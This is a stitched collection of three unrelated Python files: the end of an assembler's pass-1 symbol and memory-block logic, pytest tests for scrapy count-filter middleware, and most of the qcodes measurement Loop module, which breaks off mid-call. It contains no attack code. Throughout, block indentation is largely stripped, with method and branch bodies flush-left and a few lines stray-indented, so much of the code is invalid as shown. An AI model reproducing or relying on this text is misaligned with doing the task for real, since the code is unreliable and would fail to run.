popo.health |= Bit.BIT15
return self.send_popo(popo)
# Save symbol, get address of transform.
sym_xform = self._xforms[symbol.health]
        if symbol.health <= 2 or symbol.health != 5:
# Branch if loc sym was not leftover.
return self.it_is(popo, loc_loc, symbol, sym_xform, adr_wd, adr_symbol, check_loc=True)
# Branch if an OK definition was made.
if loc_loc >= ONES:
# Throw up hands if EQUALS failed to def.
new_health = 0xF
return self.not_ok_def(popo, loc_loc, symbol, sym_xform, adr_wd, adr_symbol)
if symbol.value < 0:
# When symbol goes with leftover erase.
sym_type = MemType.ERASABLE
else:
# When symbol goes with lefto con or inst.
sym_type = MemType.FIXED
# Branch when memory type is known.
midx = 0
while loc_loc > self.m_typ_tab[midx][1]:
midx += 1
mem_type = self.m_typ_tab[midx][0]
# Br if leftover equated to wrong type.
if sym_type != mem_type:
# Indicate type error in symbol table.
new_health = 0xC
return self.end_is(popo, loc_loc, symbol, new_health)
        hi_lim = loc_loc + abs(symbol.value)
        if hi_lim > self.m_typ_tab[midx][1]:
new_health = 0xC
return self.end_is(popo, loc_loc, symbol, new_health)
for loc in range(loc_loc, hi_lim):
if not self.avail(loc, reserve=True):
# Force special transform if conflict
sym_xform = 0xA000
adr_wd[1] = hi_lim
return self.it_is(popo, loc_loc, symbol, sym_xform, adr_wd, adr_symbol)
def it_is(self, popo, loc_loc, symbol, sym_xform, adr_wd, adr_symbol=None, check_loc=False):
if check_loc and loc_loc >= ONES:
return self.not_ok_def(popo, loc_loc, symbol, sym_xform, adr_wd, adr_symbol)
new_health = (sym_xform >> 3*4) & 0xF
return self.end_is(popo, loc_loc, symbol, new_health)
def end_is(self, popo, loc_loc, symbol, new_health):
self._loc_state = LocStateBit.SYMBOLIC
self.sy_def_xit(loc_loc, symbol, new_health)
# Exit unless loc symbol failed to fit.
b8b17 = Bit.BIT8 | Bit.BIT17
if (self._loc_state & b8b17) != b8b17:
return self.send_popo(popo)
# Branch if op code is equals.
if popo.health & HealthBit.CARD_TYPE_EQUALS:
# Show unfitting of equals loc sym.
popo.health |= Bit.BIT15
else:
# Show unfitting of erase loc sym.
popo.health |= Bit.BIT15
return self.send_popo(popo)
def not_ok_def(self, popo, loc_loc, symbol, sym_xform, adr_wd, adr_symbol=None):
if popo.health & Bit.BIT13:
new_health = 0xF
return self.end_is(popo, loc_loc, symbol, new_health)
if popo.health & Bit.BIT14:
new_health = (sym_xform >> 1*4) & 0xF
return self.end_is(popo, loc_loc, symbol, new_health)
if abs(adr_wd[1]) > 0o77777:
popo.health |= HealthBit.OVERSIZE
new_health = (sym_xform >> 1*4) & 0xF
return self.end_is(popo, loc_loc, symbol, new_health)
symbol.definer = adr_symbol.name
if symbol.name not in adr_symbol.definees:
adr_symbol.definees.append(symbol.name)
new_health = (sym_xform >> 2*4) & 0xF
return self.end_is(popo, adr_wd[1], symbol, new_health)
def no_adress(self, popo, adr_wd, adr_symbol=None):
if (popo.health & HealthBit.CARD_TYPE_MASK) != HealthBit.CARD_TYPE_EQUALS:
return self.nd_setloc(popo)
loc_loc = ONES
return self.iseq_lsym(popo, loc_loc, adr_wd, adr_symbol)
def block(self, popo):
# Asterisk makes illegal op.
if popo.health & HealthBit.ASTERISK:
return self.illegop(popo)
# Decode address field.
adr_wd = self.adr_field(popo)
if self._field_cod[0] is None or self._field_cod[0] & FieldCodBit.SYMBOLIC:
# When address field is meaningless or there is no numeric part.
return self.ilfo_blok(popo)
# Branch if address field is blank or main part is signed num.
unsigned_mask = FieldCodBit.NUMERIC | FieldCodBit.UNSIGNED
if (self._field_cod[0] & unsigned_mask) != unsigned_mask:
if self._field_cod[0] != 0:
if self._field_cod[1] == 0:
adr_wd[1] = adr_wd[0]
else:
adr_wd[1] += adr_wd[0]
if self._loc_ctr >= ONES:
# Cannot evaluate rel to bad location.
popo.health |= Bit.BIT14
return self.block_loc(popo)
# Set loc value to beginning of bank.
loc_value = self._loc_ctr & ~self.blok_ones
# Show whether modifier is present
self._field_cod[1] = self._field_cod[0]
else:
# Shift amount supplied by initialization.
loc_value = adr_wd[0] << self.blok_shif
# Omit increase for blank bank.
if self._field_cod[0] != 0:
loc_value += (self.bank_inc << self.blok_shif)
# Branch if there is no modifier.
if self._field_cod[1] != 0:
# Error if modifier is minus or modifier greater than block size.
if adr_wd[1] < 0 or adr_wd[1] > self.blok_ones:
return self.ilfo_blok(popo)
# Add modifier to shifted numeric.
loc_value += adr_wd[1]
if loc_value > self.max_loc:
# Exit for no such block.
popo.health |= Bit.BIT11
return self.block_loc(popo)
# Look up memory type.
midx = 0
while loc_value > self.m_typ_tab[midx][1]:
midx += 1
mem_type = self.m_typ_tab[midx][0]
# Branch if in fixed or erasable.
if mem_type == MemType.SPEC_NON:
# Memory type error exit.
popo.health |= Bit.BIT13
return self.block_loc(popo)
loc = loc_value
# Form end of major block.
loc_value |= self.blok_ones
# Branch if major block end comes first.
if loc_value > self.m_typ_tab[midx][1]:
# When minor block end comes first.
loc_value = self.m_typ_tab[midx][1]
# Non-destructive availability test.
while loc <= loc_value:
# Branch if available.
if self.avail(loc, reserve=False):
# Store found address.
popo.health |= loc
# Set loc ctr accordingly.
self._loc_ctr = loc
return self.block_loc(popo)
loc += 1
# When block is full.
popo.health |= Bit.BIT10
return self.block_loc(popo)
def ilfo_blok(self, popo):
popo.health |= Bit.BIT12
return self.block_loc(popo)
def block_loc(self, popo):
if not popo.loc_field().isspace():
popo.health |= Bit.BIT8
popo.health |= HealthBit.CARD_TYPE_BLOCK
return self.send_popo(popo)
def subro(self, popo):
pass
def count(self, popo):
pass
def late_mem(self, popo):
popo.health |= HealthBit.CARD_TYPE_2LATE
return self.send_popo(popo)
def inish_p1(mon, yul):
# Move freeze indicator to bit 8, B17=0
if yul.switch & SwitchBit.FREEZE:
yul.switch &= ~SwitchBit.FREEZE
yul.switch |= SwitchBit.FREEZE_P1
comp_pass1 = mon.phi_load(yul.comp_name + '.PASS1', yul)
if comp_pass1 is None:
yul.typ_abort()
comp_pass1.m_special()
|
the-stack_0_25997
|
import pytest
from scrapy.http import Request
from scrapy.spiders import Spider
from scrapy.utils.test import get_crawler
from scrapy.exceptions import IgnoreRequest
from scrapy_count_filter.middleware import GlobalCountFilterMiddleware, HostsCountFilterMiddleware
def _mock_mw(spider, mwcls):
class MockedDownloader:
slots = {}
def _get_slot_key(self, a, b):
return str(a) + str(b)
class MockedEngine:
downloader = MockedDownloader()
fake_spider_closed_result = None
def close_spider(self, spider, reason):
self.fake_spider_closed_result = (spider, reason)
    # using `spider` instead of `type(spider)` here raises an exception
crawler = get_crawler(type(spider))
crawler.engine = MockedEngine()
return mwcls.from_crawler(crawler)
def test_g_disabled():
spider = Spider('spidr')
mw = _mock_mw(spider, GlobalCountFilterMiddleware)
req = Request('http://quotes.toscrape.com')
mw.page_count(None, req, spider)
mw.process_request(req, spider)
mw.page_count(None, req, spider)
mw.process_request(req, spider)
assert mw.counter['page_count'] == 2
assert mw.crawler.engine.fake_spider_closed_result is None
def test_g_enabled():
spider = Spider('spidr')
spider.count_limits = {'page_count': 1, 'item_count': 1}
mw = _mock_mw(spider, GlobalCountFilterMiddleware)
req = Request('http://quotes.toscrape.com')
mw.page_count(None, req, spider)
mw.process_request(req, spider)
assert mw.counter['page_count'] == 1
mw.page_count(None, req, spider)
mw.process_request(req, spider)
assert mw.counter['page_count'] == 2
closed_result = mw.crawler.engine.fake_spider_closed_result
assert closed_result is not None
assert closed_result[1] == 'closespider_global_counters_overflow'
def test_h_disabled():
spider = Spider('spidr')
mw = _mock_mw(spider, HostsCountFilterMiddleware)
req = Request('http://quotes.toscrape.com')
mw.page_count(None, req, spider)
mw.process_request(req, spider)
mw.page_count(None, req, spider)
mw.process_request(req, spider)
assert mw.page_host_counter['quotes.toscrape.com'] == 2
def test_h_enabled():
spider = Spider('spidr')
spider.count_limits = {'page_host_count': 1, 'item_host_count': 1}
mw = _mock_mw(spider, HostsCountFilterMiddleware)
req = Request('http://quotes.toscrape.com')
mw.page_count(None, req, spider)
mw.process_request(req, spider)
with pytest.raises(IgnoreRequest):
mw.page_count(None, req, spider)
mw.process_request(req, spider)
assert mw.page_host_counter['quotes.toscrape.com'] == 2
|
the-stack_0_25998
|
"""
Data acquisition loops.
The general scheme is:
1. create a (potentially nested) Loop, which defines the sweep setpoints and
delays
2. activate the loop (which changes it to an ActiveLoop object),
or omit this step to use the default measurement as given by the
Loop.set_measurement class method.
3. run it with the .run method, which creates a DataSet to hold the data,
and defines how and where to save the data.
Some examples:
- set default measurements for later Loop's to use
>>> Loop.set_measurement(param1, param2, param3)
- 1D sweep, using the default measurement set
>>> Loop(sweep_values, delay).run()
- 2D sweep, using the default measurement set sv1 is the outer loop, sv2 is the
inner.
>>> Loop(sv1, delay1).loop(sv2, delay2).run()
- 1D sweep with specific measurements to take at each point
>>> Loop(sv, delay).each(param4, param5).run()
- Multidimensional sweep: 1D measurement of param6 on the outer loop, and the
default measurements in a 2D loop
>>> Loop(sv1, delay).each(param6, Loop(sv2, delay)).run()
Supported commands to .set_measurement or .each are:
- Parameter: anything with a .get method and .name or .names see
parameter.py for options
- ActiveLoop (or Loop, will be activated with default measurement)
- Task: any callable that does not generate data
- Wait: a delay
"""
from typing import Optional, Sequence
from datetime import datetime
import logging
import time
import numpy as np
from qcodes.station import Station
from qcodes.data.data_set import new_data
from qcodes.data.data_array import DataArray
from qcodes.utils.helpers import wait_secs, full_class, tprint
from qcodes.utils.metadata import Metadatable
from .actions import (_actions_snapshot, Task, Wait, _Measure, _Nest,
BreakIf, _QcodesBreak)
log = logging.getLogger(__name__)
def active_loop():
return ActiveLoop.active_loop
def active_data_set():
loop = active_loop()
if loop is not None and loop.data_set is not None:
return loop.data_set
else:
return None
class Loop(Metadatable):
"""
The entry point for creating measurement loops
Args:
sweep_values: a SweepValues or compatible object describing what
parameter to set in the loop and over what values
delay: a number of seconds to wait after setting a value before
continuing. 0 (default) means no waiting and no warnings. > 0
means to wait, potentially filling the delay time with monitoring,
and give an error if you wait longer than expected.
        progress_interval: show the progress of the loop every x seconds. Default
            is None (no output)
After creating a Loop, you attach one or more ``actions`` to it, making an
``ActiveLoop``
TODO:
how? Maybe obvious but not specified! that you can ``.run()``,
or you can ``.run()`` a ``Loop`` directly, in which
case it takes the default ``actions`` from the default ``Station``
``actions`` is a sequence of things to do at each ``Loop`` step: that can be
a ``Parameter`` to measure, a ``Task`` to do (any callable that does not
yield data), ``Wait`` times, or another ``ActiveLoop`` or ``Loop`` to nest
inside this one.
"""
def __init__(self, sweep_values, delay=0, station=None,
progress_interval=None):
super().__init__()
if delay < 0:
            raise ValueError('delay must be >= 0, not {}'.format(repr(delay)))
self.sweep_values = sweep_values
self.delay = delay
self.station = station
self.nested_loop = None
self.actions = None
self.then_actions = ()
self.bg_task = None
self.bg_final_task = None
self.bg_min_delay = None
self.progress_interval = progress_interval
def __getitem__(self, item):
"""
Retrieves action with index `item`
Args:
item: actions index
Returns:
loop.actions[item]
"""
return self.actions[item]
def loop(self, sweep_values, delay=0):
"""
Nest another loop inside this one.
Args:
sweep_values:
delay (int):
Examples:
>>> Loop(sv1, d1).loop(sv2, d2).each(*a)
is equivalent to:
>>> Loop(sv1, d1).each(Loop(sv2, d2).each(*a))
Returns: a new Loop object - the original is untouched
"""
out = self._copy()
if out.nested_loop:
# nest this new loop inside the deepest level
out.nested_loop = out.nested_loop.loop(sweep_values, delay)
else:
out.nested_loop = Loop(sweep_values, delay)
return out
def _copy(self):
out = Loop(self.sweep_values, self.delay,
progress_interval=self.progress_interval)
out.nested_loop = self.nested_loop
out.then_actions = self.then_actions
out.station = self.station
return out
def each(self, *actions):
"""
Perform a set of actions at each setting of this loop.
TODO(setting vs setpoints) ? better be verbose.
Args:
*actions (Any): actions to perform at each setting of the loop
Each action can be:
- a Parameter to measure
- a Task to execute
- a Wait
- another Loop or ActiveLoop
"""
actions = list(actions)
# check for nested Loops, and activate them with default measurement
for i, action in enumerate(actions):
if isinstance(action, Loop):
default = Station.default.default_measurement
actions[i] = action.each(*default)
self.validate_actions(*actions)
if self.nested_loop:
# recurse into the innermost loop and apply these actions there
actions = [self.nested_loop.each(*actions)]
return ActiveLoop(self.sweep_values, self.delay, *actions,
then_actions=self.then_actions, station=self.station,
progress_interval=self.progress_interval,
bg_task=self.bg_task, bg_final_task=self.bg_final_task, bg_min_delay=self.bg_min_delay)
def with_bg_task(self, task, bg_final_task=None, min_delay=0.01):
"""
Attaches a background task to this loop.
Args:
task: A callable object with no parameters. This object will be
invoked periodically during the measurement loop.
bg_final_task: A callable object with no parameters. This object will be
invoked to clean up after or otherwise finish the background
task work.
min_delay (int, float): The minimum number of seconds to wait
between task invocations. Defaults to 0.01 s.
Note that if a task is doing a lot of processing it is recommended
to increase min_delay.
Note that the actual time between task invocations may be much
longer than this, as the task is only run between passes
through the loop.
"""
return _attach_bg_task(self, task, bg_final_task, min_delay)
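    # Illustrative note (added, not from the original module): a common pattern is
    # ``loop.with_bg_task(plot.update, plot.save)`` to refresh a live plot during the
    # sweep and save it once the loop finishes; ``plot`` here stands for any object
    # exposing such no-argument callables.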
@staticmethod
def validate_actions(*actions):
"""
Whitelist acceptable actions, so we can give nice error messages
if an action is not recognized
"""
for action in actions:
if isinstance(action, (Task, Wait, BreakIf, ActiveLoop)):
continue
if hasattr(action, 'get') and (hasattr(action, 'name') or
hasattr(action, 'names')):
continue
raise TypeError('Unrecognized action:', action,
'Allowed actions are: objects (parameters) with '
'a `get` method and `name` or `names` attribute, '
'and `Task`, `Wait`, `BreakIf`, and `ActiveLoop` '
'objects. `Loop` objects are OK too, except in '
'Station default measurements.')
def run(self, *args, **kwargs):
"""
shortcut to run a loop with the default measurement set
stored by Station.set_measurement
"""
default = Station.default.default_measurement
return self.each(*default).run(*args, **kwargs)
def run_temp(self, *args, **kwargs):
"""
shortcut to run a loop in the foreground as a temporary dataset
using the default measurement set
"""
return self.run(*args, quiet=True, location=False, **kwargs)
def then(self, *actions, overwrite=False):
"""
Attach actions to be performed after the loop completes.
These can only be ``Task`` and ``Wait`` actions, as they may not generate
any data.
returns a new Loop object - the original is untouched
This is more naturally done to an ActiveLoop (ie after .each())
and can also be done there, but it's allowed at this stage too so that
you can define final actions and share them among several ``Loops`` that
have different loop actions, or attach final actions to a Loop run
TODO:
examples of this ? with default actions.
Args:
*actions: ``Task`` and ``Wait`` objects to execute in order
overwrite: (default False) whether subsequent .then() calls (including
calls in an ActiveLoop after .then() has already been called on
the Loop) will add to each other or overwrite the earlier ones.
Returns:
a new Loop object - the original is untouched
"""
return _attach_then_actions(self._copy(), actions, overwrite)
def snapshot_base(self, update: bool = False,
params_to_skip_update: Optional[Sequence[str]] = None):
"""
State of the loop as a JSON-compatible dict (everything that
the custom JSON encoder class :class:'qcodes.utils.helpers.NumpyJSONEncoder'
supports).
Args:
update (bool): If True, update the state by querying the underlying
sweep_values and actions. If False, just use the latest values
in memory.
params_to_skip_update: Unused in this implementation.
Returns:
dict: base snapshot
"""
return {
'__class__': full_class(self),
'sweep_values': self.sweep_values.snapshot(update=update),
'delay': self.delay,
'then_actions': _actions_snapshot(self.then_actions, update)
}
def _attach_then_actions(loop, actions, overwrite):
"""Inner code for both Loop.then and ActiveLoop.then."""
for action in actions:
if not isinstance(action, (Task, Wait)):
raise TypeError('Unrecognized action:', action,
'.then() allows only `Task` and `Wait` '
'actions.')
if overwrite:
loop.then_actions = actions
else:
loop.then_actions = loop.then_actions + actions
return loop
def _attach_bg_task(loop, task, bg_final_task, min_delay):
"""Inner code for both Loop and ActiveLoop.bg_task"""
if loop.bg_task is None:
loop.bg_task = task
loop.bg_min_delay = min_delay
else:
raise RuntimeError('Only one background task is allowed per loop')
if bg_final_task:
loop.bg_final_task = bg_final_task
return loop
class ActiveLoop(Metadatable):
"""
Created by attaching ``actions`` to a ``Loop``, this is the object that
actually runs a measurement loop. An ``ActiveLoop`` can no longer be nested,
only run, or used as an action inside another ``Loop`` which will run the
whole thing.
The ``ActiveLoop`` determines what ``DataArrays`` it will need to hold the
data it collects, and it creates a ``DataSet`` holding these ``DataArrays``
"""
# Currently active loop, is set when calling loop.run(set_active=True)
# is reset to None when active measurement is finished
active_loop = None
def __init__(self, sweep_values, delay, *actions, then_actions=(),
station=None, progress_interval=None, bg_task=None,
bg_final_task=None, bg_min_delay=None):
super().__init__()
self.sweep_values = sweep_values
self.delay = delay
self.actions = list(actions)
self.progress_interval = progress_interval
self.then_actions = then_actions
self.station = station
self.bg_task = bg_task
self.bg_final_task = bg_final_task
self.bg_min_delay = bg_min_delay
self.data_set = None
# if the first action is another loop, it changes how delays
# happen - the outer delay happens *after* the inner var gets
# set to its initial value
self._nest_first = hasattr(actions[0], 'containers')
def __getitem__(self, item):
"""
Retrieves action with index `item`
Args:
item: actions index
Returns:
loop.actions[item]
"""
return self.actions[item]
def then(self, *actions, overwrite=False):
"""
Attach actions to be performed after the loop completes.
These can only be ``Task`` and ``Wait`` actions, as they may not
generate any data.
returns a new ActiveLoop object - the original is untouched
Args:
*actions: ``Task`` and ``Wait`` objects to execute in order
overwrite: (default False) whether subsequent .then() calls (including
calls in an ActiveLoop after .then() has already been called on
the Loop) will add to each other or overwrite the earlier ones.
"""
loop = ActiveLoop(self.sweep_values, self.delay, *self.actions,
then_actions=self.then_actions, station=self.station)
return _attach_then_actions(loop, actions, overwrite)
def with_bg_task(self, task, bg_final_task=None, min_delay=0.01):
"""
Attaches a background task to this loop.
Args:
task: A callable object with no parameters. This object will be
invoked periodically during the measurement loop.
bg_final_task: A callable object with no parameters. This object will be
invoked to clean up after or otherwise finish the background
task work.
min_delay (int, float): The minimum number of seconds to wait
between task invocations. Note that the actual time between
task invocations may be much longer than this, as the task is
only run between passes through the loop. Defaults to 0.01 s.
"""
return _attach_bg_task(self, task, bg_final_task, min_delay)
def snapshot_base(self, update=False,
params_to_skip_update: Optional[Sequence[str]] = None):
"""Snapshot of this ActiveLoop's definition."""
return {
'__class__': full_class(self),
'sweep_values': self.sweep_values.snapshot(update=update),
'delay': self.delay,
'actions': _actions_snapshot(self.actions, update),
'then_actions': _actions_snapshot(self.then_actions, update)
}
def containers(self):
"""
Finds the data arrays that will be created by the actions in this
loop, and nests them inside this level of the loop.
Recursively calls `.containers` on any enclosed actions.
"""
loop_size = len(self.sweep_values)
data_arrays = []
loop_array = DataArray(parameter=self.sweep_values.parameter,
is_setpoint=True)
loop_array.nest(size=loop_size)
data_arrays = [loop_array]
# hack set_data into actions
new_actions = self.actions[:]
if hasattr(self.sweep_values, "parameters"): # combined parameter
for parameter in self.sweep_values.parameters:
new_actions.append(parameter)
for i, action in enumerate(new_actions):
if hasattr(action, 'containers'):
action_arrays = action.containers()
elif hasattr(action, 'get'):
# this action is a parameter to measure
# note that this supports lists (separate output arrays)
# and arrays (nested in one/each output array) of return values
action_arrays = self._parameter_arrays(action)
else:
# this *is* covered but the report misses it because Python
# optimizes it away. See:
# https://bitbucket.org/ned/coveragepy/issues/198
continue # pragma: no cover
for array in action_arrays:
array.nest(size=loop_size, action_index=i,
set_array=loop_array)
data_arrays.extend(action_arrays)
return data_arrays
def _parameter_arrays(self, action):
out = []
# first massage all the input parameters to the general multi-name form
if hasattr(action, 'names'):
names = action.names
full_names = action.full_names
labels = getattr(action, 'labels', names)
if len(labels) != len(names):
raise ValueError('must have equal number of names and labels')
action_indices = tuple((i,) for i in range(len(names)))
elif hasattr(action, 'name'):
names = (action.name,)
full_names = (action.full_name,)
labels = (getattr(action, 'label', action.name),)
action_indices = ((),)
else:
raise ValueError('a gettable parameter must have .name or .names')
if hasattr(action, 'names') and hasattr(action, 'units'):
units = action.units
elif hasattr(action, 'unit'):
units = (action.unit,)
else:
units = tuple(['']*len(names))
num_arrays = len(names)
shapes = getattr(action, 'shapes', None)
sp_vals = getattr(action, 'setpoints', None)
sp_names = getattr(action, 'setpoint_names', None)
sp_labels = getattr(action, 'setpoint_labels', None)
sp_units = getattr(action, 'setpoint_units', None)
if shapes is None:
shapes = (getattr(action, 'shape', ()),) * num_arrays
sp_vals = (sp_vals,) * num_arrays
sp_names = (sp_names,) * num_arrays
sp_labels = (sp_labels,) * num_arrays
sp_units = (sp_units,) * num_arrays
else:
sp_blank = (None,) * num_arrays
# _fill_blank both supplies defaults and tests length
# if values are supplied (for shapes it ONLY tests length)
shapes = self._fill_blank(shapes, sp_blank)
sp_vals = self._fill_blank(sp_vals, sp_blank)
sp_names = self._fill_blank(sp_names, sp_blank)
sp_labels = self._fill_blank(sp_labels, sp_blank)
sp_units = self._fill_blank(sp_units, sp_blank)
# now loop through these all, to make the DataArrays
# record which setpoint arrays we've made, so we don't duplicate
all_setpoints = {}
for name, full_name, label, unit, shape, i, sp_vi, sp_ni, sp_li, sp_ui in zip(
names, full_names, labels, units, shapes, action_indices,
sp_vals, sp_names, sp_labels, sp_units):
if shape is None or shape == ():
shape, sp_vi, sp_ni, sp_li, sp_ui= (), (), (), (), ()
else:
sp_blank = (None,) * len(shape)
sp_vi = self._fill_blank(sp_vi, sp_blank)
sp_ni = self._fill_blank(sp_ni, sp_blank)
sp_li = self._fill_blank(sp_li, sp_blank)
sp_ui = self._fill_blank(sp_ui, sp_blank)
setpoints = ()
# loop through dimensions of shape to make the setpoint arrays
for j, (vij, nij, lij, uij) in enumerate(zip(sp_vi, sp_ni, sp_li, sp_ui)):
sp_def = (shape[: 1 + j], j, setpoints, vij, nij, lij, uij)
if sp_def not in all_setpoints:
all_setpoints[sp_def] = self._make_setpoint_array(*sp_def)
out.append(all_setpoints[sp_def])
setpoints = setpoints + (all_setpoints[sp_def],)
# finally, make the output data array with these setpoints
out.append(DataArray(name=name, full_name=full_name, label=label,
shape=shape, action_indices=i, unit=unit,
set_arrays=setpoints, parameter=action))
return out
def _fill_blank(self, inputs, blanks):
if inputs is None:
return blanks
elif len(inputs) == len(blanks):
return inputs
else:
raise ValueError('Wrong number of inputs supplied')
def _make_setpoint_array(self, shape, i, prev_setpoints, vals, name,
label, unit):
if vals is None:
vals = self._default_setpoints(shape)
elif isinstance(vals, DataArray):
# can't simply use the DataArray, even though that's
# what we're going to return here, because it will
# get nested (don't want to alter the original)
# DataArrays do have the advantage though of already including
# name and label, so take these if they exist
if vals.name is not None:
name = vals.name
if vals.label is not None:
label = vals.label
# extract a copy of the numpy array
vals = np.array(vals.ndarray)
else:
# turn any sequence into a (new) numpy array
vals = np.array(vals)
if vals.shape != shape:
raise ValueError('nth setpoint array should have shape matching '
'the first n dimensions of shape.')
if name is None:
name = 'index{}'.format(i)
return DataArray(name=name, label=label, set_arrays=prev_setpoints,
shape=shape, preset_data=vals, unit=unit, is_setpoint=True)
def _default_setpoints(self, shape):
if len(shape) == 1:
return np.arange(0, shape[0], 1)
sp = np.ndarray(shape)
sp_inner = self._default_setpoints(shape[1:])
for i in range(len(sp)):
sp[i] = sp_inner
return sp
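    # Worked example (added for illustration): _default_setpoints((2, 3)) returns a
    # 2x3 array whose rows are both arange(3), i.e. [[0, 1, 2], [0, 1, 2]].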
def set_common_attrs(self, data_set, use_threads):
"""
set a couple of common attributes that the main and nested loops
all need to have:
- the DataSet collecting all our measurements
- a queue for communicating with the main process
"""
self.data_set = data_set
self.use_threads = use_threads
for action in self.actions:
if hasattr(action, 'set_common_attrs'):
action.set_common_attrs(data_set, use_threads)
def get_data_set(self, *args, **kwargs):
"""
Return the data set for this loop.
If no data set has been created yet, a new one will be created and
returned. Note that all arguments can only be provided when the
`DataSet` is first created; giving these during `run` when
`get_data_set` has already been called on its own is an error.
Args:
data_manager: a DataManager instance (omit to use default,
False to store locally)
kwargs are passed along to data_set.new_data. The key ones are:
Args:
location: the location of the DataSet, a string whose meaning
depends on formatter and io, or False to only keep in memory.
May be a callable to provide automatic locations. If omitted, will
use the default DataSet.location_provider
name: if location is default or another provider function, name is
a string to add to location to make it more readable/meaningful
to users
formatter: knows how to read and write the file format
default can be set in DataSet.default_formatter
io: knows how to connect to the storage (disk vs cloud etc)
write_period: how often to save to storage during the loop.
default 5 sec, use None to write only at the end
returns:
a DataSet object that we can use to plot
"""
if self.data_set is None:
data_set = new_data(arrays=self.containers(), *args, **kwargs)
self.data_set = data_set
else:
has_args = len(kwargs) or len(args)
if has_args:
raise RuntimeError(
'The DataSet for this loop already exists. '
'You can only provide DataSet attributes, such as '
'data_manager, location, name, formatter, io, '
'write_period, when the DataSet is first created.')
return self.data_set
def run_temp(self, **kwargs):
"""
wrapper to run this loop in the foreground as a temporary data set,
especially for use in composite parameters that need to run a Loop
as part of their get method
"""
return self.run(quiet=True, location=False, **kwargs)
def run(self, use_threads=False, quiet=False, station=None,
progress_interval=False, set_active=True, *args, **kwargs):
"""
Execute this loop.
Args:
use_threads: (default False): whenever there are multiple `get` calls
back-to-back, execute them in separate threads so they run in
parallel (as long as they don't block each other)
quiet: (default False): set True to not print anything except errors
station: a Station instance for snapshots (omit to use a previously
provided Station, or the default Station)
progress_interval (int, float): show progress of the loop every x
seconds. If provided here, will override any interval provided
with the Loop definition. Defaults to None
kwargs are passed along to data_set.new_data. These can only be
provided when the `DataSet` is first created; giving these during `run`
when `get_data_set` has already been called on its own is an error.
The key ones are:
Args:
location: the location of the DataSet, a string whose meaning
depends on formatter and io, or False to only keep in memory.
May be a callable to provide automatic locations. If omitted, will
use the default DataSet.location_provider
name: if location is default or another provider function, name is
a string to add to location to make it more readable/meaningful
to users
formatter: knows how to read and write the file format
default can be set in DataSet.default_formatter
io: knows how to connect to the storage (disk vs cloud etc)
write_period: how often to save to storage during the loop.
default 5 sec, use None to write only at the end
returns:
a DataSet object that we can use to plot
"""
if progress_interval is not False:
self.progress_interval = progress_interval
data_set = self.get_data_set(*args, **kwargs)
self.set_common_attrs(data_set=data_set, use_threads=use_threads)
station = station or self.station or Station.default
if station:
data_set.add_metadata({'station': station.snapshot()})
# information about the loop definition is in its snapshot
data_set.add_metadata({'loop': self.snapshot()})
# then add information about how and when it was run
ts = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
data_set.add_metadata({'loop': {
'ts_start': ts,
'use_threads': use_threads,
}})
data_set.save_metadata()
if set_active:
ActiveLoop.active_loop = self
try:
if not quiet:
print(datetime.now().strftime('Started at %Y-%m-%d %H:%M:%S'))
self._run_wrapper()
ds = self.data_set
finally:
if not quiet:
print(repr(self.data_set))
print(datetime.now().strftime('Finished at %Y-%m-%d %H:%M:%S'))
# After normal loop execution we clear the data_set so we can run
# again. But also if something went wrong during the loop execution
# we want to clear the data_set attribute so we don't try to reuse
# this one later.
self.data_set = None
if set_active:
ActiveLoop.active_loop = None
return ds
def _compile_actions(self, actions, action_indices=()):
callables = []
measurement_group = []
for i, action in enumerate(actions):
new_action_indices = action_indices + (i,)
if hasattr(action, 'get'):
measurement_group.append((action, new_action_indices))
continue
elif measurement_group:
callables.append(_Measure(measurement_group, self.data_set,
self.use_threads))
measurement_group[:] = []
callables.append(self._compile_one(action, new_action_indices))
if measurement_group:
callables.append(_Measure(measurement_group, self.data_set,
self.use_threads))
measurement_group[:] = []
return callables
def _compile_one(self, action, new_action_indices):
if isinstance(action, Wait):
return Task(self._wait, action.delay)
elif isinstance(action, ActiveLoop):
return _Nest(action, new_action_indices)
else:
return action
def _run_wrapper(self, *args, **kwargs):
try:
self._run_loop(*args, **kwargs)
finally:
if hasattr(self, 'data_set'):
# TODO (giulioungaretti) WTF?
# somehow this does not show up in the data_set returned by
# run(), but it is saved to the metadata
ts = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
self.data_set.add_metadata({'loop': {'ts_end': ts}})
self.data_set.finalize()
def _run_loop(self, first_delay=0, action_indices=(),
loop_indices=(), current_values=(),
**ignore_kwargs):
"""
the routine that actually executes the loop, and can be called
from one loop to execute a nested loop
first_delay: any delay carried over from an outer loop
action_indices: where we are in any outer loop action arrays
loop_indices: setpoint indices in any outer loops
current_values: setpoint values in any outer loops
signal_queue: queue to communicate with main process directly
ignore_kwargs: for compatibility with other loop tasks
"""
# at the beginning of the loop, the time to wait after setting
# the loop parameter may be increased if an outer loop requested longer
delay = max(self.delay, first_delay)
callables = self._compile_actions(self.actions, action_indices)
n_callables = 0
for item in callables:
if hasattr(item, 'param_ids'):
n_callables += len(item.param_ids)
else:
n_callables += 1
t0 = time.time()
last_task = t0
imax = len(self.sweep_values)
self.last_task_failed = False
for i, value in enumerate(self.sweep_values):
if self.progress_interval is not None:
tprint('loop %s: %d/%d (%.1f [s])' % (
self.sweep_values.name, i, imax, time.time() - t0),
dt=self.progress_interval, tag='outerloop')
if i:
tprint("Estimated finish time: %s" % (
time.asctime(time.localtime(t0 + ((time.time() - t0) * imax / i)))),
dt=self.progress_interval, tag="finish")
set_val = self.sweep_values.set(value)
new_indices = loop_indices + (i,)
new_values = current_values + (value,)
data_to_store = {}
if hasattr(self.sweep_values, "parameters"): # combined parameter
set_name = self.data_set.action_id_map[action_indices]
if hasattr(self.sweep_values, 'aggregate'):
value = self.sweep_values.aggregate(*set_val)
# below is useful but too verbose even at debug
# log.debug('Calling .store method of DataSet because '
# 'sweep_values.parameters exist')
self.data_set.store(new_indices, {set_name: value})
# set_val list of values to set [param1_setpoint, param2_setpoint ..]
for j, val in enumerate(set_val):
set_index = action_indices + (j+n_callables, )
set_name = (self.data_set.action_id_map[set_index])
data_to_store[set_name] = val
else:
set_name = self.data_set.action_id_map[action_indices]
data_to_store[set_name] = value
# below is useful but too verbose even at debug
# log.debug('Calling .store method of DataSet because a sweep step'
# ' was taken')
self.data_set.store(new_indices, data_to_store)
if not self._nest_first:
# only wait the delay time if an inner loop will not inherit it
self._wait(delay)
try:
for f in callables:
# below is useful but too verbose even at debug
# log.debug('Going through callables at this sweep step.'
# ' Calling {}'.format(f))
f(first_delay=delay,
loop_indices=new_indices,
